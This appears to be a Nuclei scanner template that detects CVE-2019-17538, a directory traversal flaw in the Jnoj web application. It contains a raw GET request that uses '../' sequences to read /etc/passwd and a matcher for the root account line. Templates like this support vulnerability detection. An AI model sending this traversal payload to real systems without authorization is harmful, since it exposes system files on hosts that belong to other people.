nuclei-templates/cves/2019/CVE-2019-17538.yaml

24 lines
589 B
YAML

id: CVE-2019-17538
info:
name: Jnoj Directory Traversal for file reading(LFI)
author: pussycat0x
severity: high
reference: https://github.com/shi-yang/jnoj/issues/53
tegs: cve.cve2019,jnoj,lfi
requests:
- raw:
- |
GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body